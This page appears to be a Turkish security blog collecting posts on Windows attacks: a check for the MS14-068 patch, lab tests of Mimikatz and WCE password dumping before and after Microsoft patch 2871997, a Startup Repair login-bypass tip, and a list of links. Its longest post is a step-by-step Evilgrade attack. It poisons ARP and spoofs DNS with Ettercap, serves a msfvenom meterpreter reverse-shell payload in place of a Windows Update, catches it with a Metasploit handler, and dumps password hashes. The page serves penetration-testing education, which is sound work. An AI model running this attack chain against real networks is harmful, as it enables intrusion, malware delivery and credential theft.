MS14-068 Kritik Windows Güncellemesi ve Zafiyetin İstismarı

MS14-068 Kritik Windows Güncellemesi ve Zafiyetin İstismarı

Microsoft tarafından MS14-068 hak yükseltme zafiyetine ait bülten 18 Kasım 2014 tarihinde yayınlanmıştı. Zafiyete ait güncelleme KB3011780 güncelleme paketi bulunmaktadır. Bu paketin sistemde mevcudiyetini kontrol etmek için bağlantıdaki Powershell betiği kullanılabilir veya daha basit olarak aşağıdaki komut çalıştırılabilir:

wmic qfe where HotFixID="KB3011780" get Caption, HotFixID

Yazının devamı için bakınız:
http://www.siberportal.org/blue-team/securing-microsoft-domain-environment/mitigating-the-vulnerability-in-kerberos-could-allow-elevation-of-privilege-ms14-068/
ve
http://www.siberportal.org/red-team/microsoft-domain-environment-penetration-tests/obtaining-domain-admin-privileges-by-exploiting-ms14-068-vulnerability-with-the-python-kerberos-exploitation-kit-pykek/
ve
http://www.siberportal.org/blue-team/securing-microsoft-domain-environment/analysis-vulnerability-in-kerberos-could-allow-elevation-of-privilege-ms14-068/

2871997 Microsoft Güvenlik Bülteni ve Mimikatz

2871997 Microsoft Güvenlik Bülteni ve Mimikatz

Mimikatz ve WCE (Windows Credentials Editor) gibi araçlar kullanılarak RAM üzerindeki kullanıcı adı ve parola bilgileri açık olarak elde edilebilmektedir. Konu ile ilgili ayrıntılı için, Bilgi Güvenliği Kapısı'ndaki "Bellekten Parolaların Elde Edilmesi:" yazıları incelenebilir [1][2][3].

Microsoft ve Mimikatz'ın Karşılıklı Güncelleştirme Adımları

Microsoft, bellek üzerinden parolaların açık halinin elde edilmesini önlemek için 13 Mayıs 2014 tarihinde 2871997 numaralı en önemli ilk güncelleme bültenini yayınlamıştır [4]. Bu güncelleştirme paketi [5] Windows 8, Windows RT, Windows Server 2012, Windows 7 ve Windows Server 2008 R2 işletim sistemlerindeki kimlik hırsızlığını azaltmak için hazırlanmıştır. Bu yama sonrasında, Microsoft tarafından, 2973351 [6] ve 2975625 [7] güncelleştirmeleri de yayınlanmıştır.

Microsoft tarafından yayınlanan bu yamalardan sonra, Benjamin Delpy tarafından da Mimikatz'in 2.0 versiyonu yayınlanmıştır. Bu yazıda da hem Mimikatz 1.0, hem de Mimikatz 2.0 sürümleri kullanılmıştır.

İncelemeler Sırasında Kullanılan Ortam Hakkında Bilgi

Yazının amacı, Microsoft tarafından yayınlanan yamaların etkisini incelemektir. Bu inceleme sırasında işletim sistemi sürümü ve mimarisi, yamanın geçilme durumu, kullanılan Mimikatz sürümü, birbirinden farklı olan etki alanı ortamları kriterleri temek alınmıştır. İnceleme kriterleri şu şekildedir:

• İşletim Sistemi Sürümü: Windows 7 Enterprise, Windows 8 Enterprise, Windows 2008 R2 Enterprise, Windows 2012 Data Center
• İşletim Sistemi Mimarisi: 64 bit, 32 bit
• Güncelleme Durumu: Yaması gerçekleştirilmemiş, Yaması gerçekleştirilmiş
• Mimikatz Sürümü: 1.0 ve 2.0
• Etki alanı: WORKGROUP ve Ornek.local
• Kullanıcı: Yerel bir yönetici kullanıcısı (WORKGROUP\Yonetici), etki alanında yönetici olan bir kullanıcı (ORNEK\DomainAdmin)

Bir İncelemede Gerçekleştirilen Adımlar

İnceleme temel olarak 2 adımdan oluşmaktadır. İlk adımda yaması yapılmamış işletim sisteminde Mimikatz 1.0 ve 2.0 araçları kullanılmış ve parolaların elde edilip edilmediği sonucu not edilmiştir. İkinci adımda ise, Microsoft tarafından yayınlanan yama gerçekleştirilmiş olan işletim sisteminde Mimikatz 1.0 ve 2.0 araçları kullanılmış ve parolaların elde edilip edilmediği sonucu not edilmiştir.

İlk adımda; Microsoft tarafından hazırlanan yamaları yapılmamış olan "W7-Pro-SP1-x64-15GB" adındaki bir bilgisayarda "Yonetici" adlı bir yerel yönetici kullanıcısı ile oturum açılmıştır. Bu bilgisayardan, "W7-Ent-x86-15GB" adlı bilgisayara da "UzakYonetici" adlı bir yerel yönetici kullanıcısı ile RDP yoluyla bağlantı kurulmuştur. Bu durumdayken Mimikatz aracı kullanıldığında aşağıdaki gibi ekran görüntüleri elde edilmiştir.
İlk ekran görüntüsü eski sürüm Mimikatz ile, ikinci ekran görüntüsü ise yeni sürüm Mimikatz ile elde edilmiştir:

Şekil - 1: Microsoft güncellemesi yapılmamış bir bilgisayarda Mimikatz 1.0 aracının çalıştırılması

Şekil - 2: Microsoft güncellemesi yapılmamış bir bilgisayarda Mimikatz 2.0 aracının çalıştırılması

Sonuç olarak, ekran görüntüsünde de görüldüğü gibi, kimlik bilgileri 5 adet güvenlik destek sağlayıcısı (Security Support Provider - SSP) tarafından elde edilebilmiştir. "Yonetici" kullanıcısına ait parola "Aa123456" olarak elde edilmiş iken, "UzakYonetici" kullanıcısına ait parola ise "Bb123456" olarak elde edilmiştir.

İkinci adımın gerçekleştirilmesi için ilgili güncelleme paketi indirilerek işletim sistemi yaması gerçekleştirilmiştir.

Şekil - 3: Microsoft güncellemesinin gerçekleştirilmesi

İkinci adımda ise, yama işlemi sonrasında ilk adımdaki durumlar (oturum açılması ve RDP gerçekleştirilmesi) sağlandıktan sonra, Mimikatz 1.0 ve 2.0 sürümlerinin çalıştırılmasına ait ekran görüntüleri aşağıdaki gibidir:

Şekil - 4: Microsoft güncellemesi yapılmış bir bilgisayarda Mimikatz 1.0 aracının çalıştırılması

Şekil - 5: Microsoft güncellemesi yapılmış bir bilgisayarda Mimikatz 2.0 aracının çalıştırılması

Microsoft tarafından gerçekleştirilen güncelleme sonrasında WCE kaynak kodunda herhangi bir geliştirme gerçekleştirilmemiştir. Eski sürüm WCE ve son sürüm WCE aracıyla gerçekleştirilen incelemelerin sonucu aşağıdaki gibidir.

Şekil - 6: Microsoft güncellemesi yapılmamış bir bilgisayarda eski ve yeni sürüm WCE aracının çalıştırılması

Şekil - 7: Microsoft güncellemesi yapılmış bir bilgisayarda eski ve yeni sürüm WCE aracının çalıştırılması

Ekran görüntülerinde de görüldüğü gibi, Microsoft yamasının öncesinde ve sonrasında WCE aracıyla parolalar elde edilebilmektedir. Ancak RDP yapılan bilgisayara bağlantı bilgileri WCE aracıyla elde edilememektedir.

Tüm İnceleme Sonuçlarının Listelenmesi

Gerçekleştirilen incelemeler sonucunda aşağıdaki gibi bir tablo elde edilmiştir:

Şekil - 8: Microsoft güncellemelerinin incelenmesine ait tablo

Not: Yaması yapılmış Windows Server 2012 Data Center'da msv1_0 üzerinden parola özeti elde edilememektedir. Ancak genelleme bozulmaması için bu durum ihmal edilmiştir. Ayrıca, yaması geçilmiş bu işletim sisteminde WCE aracı düzgün olarak çalışmamaktadır.

Sonuçlardan da görüldüğü gibi, 2871997 ve sonraki 2 yama kimlik bilgisi hırsızlığını azaltmıştır. Ancak, parolalar wdigest ve ssp adlı sağlayıcılar üzerinden açık, msv1_0 üzerinden ise özet olarak elde edilebilmektedir.


[1] http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/bellekten-parolalarin-elde-edilmesi-1.html
[2] http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/bellekten-parolalarin-elde-edilmesi-2.html
[3] http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/bellekten-parolalarin-elde-edilmesi-3.html
[4] https://technet.microsoft.com/library/security/2871997
[5] https://support.microsoft.com/kb/2871997
[6] https://support.microsoft.com/kb/2973351
[7] https://support.microsoft.com/kb/2975625

İpucu: Launch Startup Repair ile Fiziksel Olarak Erişilen Bilgisayarı Ele Geçirme

İpucu: Launch Startup Repair ile Fiziksel Olarak Erişilen Bilgisayarı Ele Geçirme

Bilgisayar açıldığında bir şekilde "Windows Error Recovery" ekranına getirilir. Bunun için PC yeniden başlatılırken, işletim sistemi yüklenmesi sırasında zorla bilgisayar yeniden başlatılabilir. Aşağıdaki ekranda "Launch Startup Repair (recommended)" seçeneği seçilir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/bypassing-windows-authentication-exploiting-launch-repair-startup/

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

İpucu: Windows Update Özelliğinin Kötüye Kullanılması

Uygun şekilde yapılandırılmamaış ağlarda saldırgan, kurban olarak seçtiği bir bilgisayar ile bu bilgisayarın gitmek istediği hedef adresin arasına girebilir. Örneğin Windows işletim sistemini güncellemesini gerçekleştirmek isteyen kurban, Microsoft’un güncelleme sitesine gitmek yerine, saldırganın belirlediği DNS kaydına göre ilgili bir sunucuya yönlendirilebilir. Böylece Windows işletim güncellemesi yerine saldırganın gönderdiği zararlı yazılım yüklenerek kurban bilgisayar, saldırganın eline geçmiş olur.

Bu işlemler 7 adımda incelenecektir:

• Saldırgan ve kurban bilgisayarları birbirlerine olan erişimleri kontrol edilecek
• Evilgrade uygulaması kurulacak ve “winupdate” modülü seçilecek
• “winupdate” modülü ve ilgili diğer kaynaklar ayarlanacak
• Ettercap ile KurbanaDNS spoofing saldırısı gerçekleştirilecek
• Saldırgan, kurban bilgisayardan gelen bağlantı taleplerini dinleyecek olan bir ortamı hazırlayacak
• Kurban işletim sistemini güncellemek için talepte bulunacak ve saldırganın hazırlamış olduğu zararlı uygulamayı indirecek
• Kurbanın zararlı yazılımı çalıştırmasıyla saldırgan kurbanın bilgisayarına bağlanacak ve hak yükseltecek

Erişimlerin Kontrolü
Kurban makine (192.168.100.78), saldırgan makineye erişebilmektedir:

Saldırgan makine (192.168.100.75), kurban makineye erişebilmektedir:

Evilgrade Uygulamasının Kurulumu ve Seçilen Modülün Seçilmesi
Öncelikle www.github.com/infobyte/evilgrade adresinden uygulama sıkıştırılmış bir dosya olarak indirilir:

Bu dosya saldırgana ait Backtrack bilgisayarına kopyalanır ve sıkıştırılmış dosya açılır. Evilgrade betiği çalıştırılır:

Modüllerin yüklenmesi beklenir:

Not: Diğer EvilGrade kurulum metodları için bakınız: http://blog.techdynamics.org/2011/07/howto-install-evilgrade-on-backtrack5.html

Not: Modüllerin listelenmesi için aşağıdaki komut çalıştırılır.

show modules

“winupdate” modülü kullanılmaya başlanır. Kullanılan komutlar aşağıdaki gibidir:

configure winupdate
show options

Not: Betik büyük/küçük harf duyarlıdır.
Üstteki ekran görüntüsünde de görüldüğü gibi “microsoft.com” üst alan adındaki bir takım sitelere erişim sağlanmaya çalışıldığında “agent.exe” adlı uygulama gönderilecektir.

“winupdate” Modülünün ve İlgili Kaynakların Ayarlanması
winupdate modülünde iki önemli nokta vardır: VirtualHost ve Agent. Bu başlıkta, 2 değere göre kaynak ayarlaması gerçekleştirilecektir.

VirtualHost: Kurban bilgisayara gerçekleştirilecek DNS Spoofing saldırısı için Ettercap adı verilen bir uygulama kullanılacaktır. Ettercap uygulaması, DNS spoofing için “/usr/local/share/ettercap/etter.dns” adlı dosyadaki DNS kayıtlarını kullanmaktadır. Bu dosya açılarak içerisine Microsoft sistemlerinin güncellenmesi için kulanılan DNS kayıtları için saldırgan tarafından belirlenen IP adresleri yazılır. Bu adres saldırganın sahip olduğu başka bir saldırı makinesi olabileceği gibi, saldırgann kullandığı Backtrack makinesi de olabilir. Örnek olarak saldırganın makinesi verilmiştir:

Agent: Kurbana gönderilecek olan ajan uygulamanın oluşturulması için msfcli, msfpayload, msfvenom, veya diğer teknikler kullanılabilir. Örnek olarak msfvenom kullanılacaktır. Bu amaçla ayrı bir konsolda msfvenom dizini tespit edilir:

which msfvenom
ls -la /usr/local/bin/msfvenom

EvilGrade uygulamasının başlatıldığı konsola geri dönülerek ajan uygulama oluşturulur. Bunun için, msfvenom kullanılarak kurbanın bağlanması istenen IP adresi (192.168.100.75) ve porta (TCP/4444) bağlantıyı sağlayacak olan “WindowsGuncellemeSaldirisi.exe” adlı bir exe oluşturulup tmp dizinine kaydedilir. Daha sonra da bu exe, ajan olarak ayarlanır.

set agent '["/opt/metasploit-4.4.0/app/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.100.75 LPORT=4444 -f exe  1> <%OUT%>/tmp/WindowsGuncellemeSaldirisi.exe<%OUT%>"]'

Ettercap ile DNS Spoofing İşleminin Başlatılması
Öncelikle boş bir konsol kullanılarak Ettercap arayüzü açılır. Daha sonra da spoofing işlemini gerçekleştirecek olan saldırganın ilgili ağ adaptörü seçilir (Shift + U).

ettercap -G
Sniff > Unified Sniffing 

Not: Seçilen adaptörün dinleme modunda olduğu görülmektedir.

Gelinen pencerede eklentiler listelenir (CTRL + P) ve “dns_spoof” adlı eklenti iki kerek tıklanarak aktifleştirilir:

Plugins > Manage the plugins
dns_spoof

Erişim sağlanabilen sistemler taranır (CTRL + S).

Hosts > Scan for hosts

Not: Tarama sonucunda tespit edilen sistemler listelenebilir (H):

Hosts > Hosts list

Tespit edilen sistemlere Arp zehirlemesi yapılır.

Mitm > Arp poisoning
Optional parameters: Sniff remote connections.

Not: Arp zehirleme işlemin gerçekleştirileceği gruplar otomatik olarak oluşur.

Dinleme işlemi başlatılır (CTRL +W).

Start > Start Sniffing

Not: İstemcinin herhangi bir işleminde saldırgan araya girmiş bulunmaktadır.

Saldırganın Kurban Bilgisayarı Dinlemesi
Saldırgan, saldırıya geçmeden önce kurbanın bağlantıyı kurdupubnda bu bağlantıyı dinleyeceği bir ortam gereklidir. Bu ortamı netcat sağlayabileceği gibi, meterpreter kabuğu ile iletişim kurabilen handler modülü de sağlayabilir. Kurbanın kuracağı bağlantıyı dinlemek için handler modülü başlatılır ve bağlantının kurulacağı IP (192.168.100.75) ve Port (4444) bilgisi girilir.

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.75
set LPORT 4444
show options

Gerekli ayarlamalar uygun şekilde gerçekleştirildikten sonra, kurbanın bağlantıyı başlatması beklenir:

Kurbanın Windows Güncelleştirmesini Başlatması ve Zararlı Yazılımı Alması
Kurban bilgisayarda Windows işletim sistemi güncelleştirilmesi için “windows.update.microsoft.com” adresi kullanılabilir:

Not: İşletim sisteminin otomatik olarak güncellenmesi de beklenebilirdi.
Ettercap’İn DNS kayıtlarını değiştirmesi sayesinde, kurban bilgisayar, Microsoft’un sitesi yerine saldırganın makinesine gider. EvilGrade’in winupdate modülü sayesinde de, kurban bilgisayar, yasal güncelleme paketi yerine, msfvenom ile oluşturulan zararlı yazılımı indirir:

Kurban zararlı yazılımı masaüstüne kaydeder:

Not: Zararlı yazılımının talep edilmesi EvilGrade üzerinde de görülebilmektedir.

Kurbanın Zararlı Yazılımı Çalıştırması ve Saldırganın Kurban Bilgisayarına Bağlanması
Kurban masaüstündeki zararlı yazılımı çalıştırır.

Kurban bilgisayarda bu zararlı yazılım çalıştırıldığında, yazılımın oluşturulduğu PAYLOAD sayesinde, kurban, saldırganın bilgisayarına bağlantı kuracaktır. Böylece bağlantı kurulmasını bekleyen Handler modülüne bağlantı kurulmuştur:

Artık hak yükseltme işlemi gerçekleştirilebilir. Bu amaçla tüm prosesler listelenir:

ps

Sistem hakları ile çalışan uygun bir prosese sıçranır. İstenirse yerel makinedeki hesapların parola özetleri elde edilebilir veya başka işlemler gerçekleştirilebilir:

migrate 1124
getuid
hashdump

Kaynak site:
http://www.mshowto.org/mitm-saldiri-yontemi-ile-windows-server-2008-nasil-hack-edilir.html
http://r00tsec.blogspot.com/2011/07/hacking-with-evilgrade-on-backtrack5.html

Okunası Makaleler: Windows

Windows Makaleleri

Managing Security Dependencies on Windows Networks
Kaynak site:
http://www.windowsitpro.com/content1/topic/managing-security-dependencies-windows-networks-142470/catpath/security

Forgot administrator password? The Sticky Keys trick
Kaynak site:
http://4sysops.com/archives/forgot-the-administrator-password-the-sticky-keys-trick/

Security Vulnerabilities Published In 2012
Kaynak site:
http://www.cvedetails.com/vulnerability-list.php?vendor_id=26&product_id=739&version_id=&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=2012&month=0&cweid=0&order=3&trc=24&sha=ae01f10b142929c25950e042d74165ffa1b2c1e4

The trust relationship between this domain and the primary domain failed
Kaynak site:
http://siberblog.org/index.php/the-trust-relationship-between-this-domain-and-the-primary-domain-failed/

Distinguished Names
Kaynak site:
http://msdn.microsoft.com/en-us/library/windows/desktop/aa366101(v=vs.85).aspx

WS2008: Network Level Authentication and Encryption
Kaynak site:
http://blogs.technet.com/b/askperf/archive/2008/02/16/ws2008-network-level-authentication-and-encryption.aspx

Top 10 Windows Security Configurations: Where and How!
Kaynak site:
http://www.windowsecurity.com/articles/Top-10-Windows-Security-Configurations-Where-How-Part1.html

Well-known security identifiers in Windows operating systems
Kaynak site:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;243330

Sysprep nedir ? Nasıl yapılır ?
Kaynak site:
http://www.vanstechelman.eu/windows/group_policy_settings


MCITP 70-640: Active Directory forest and trees
Kaynak site:
http://www.youtube.com/watch?v=Whh3kPS0FdA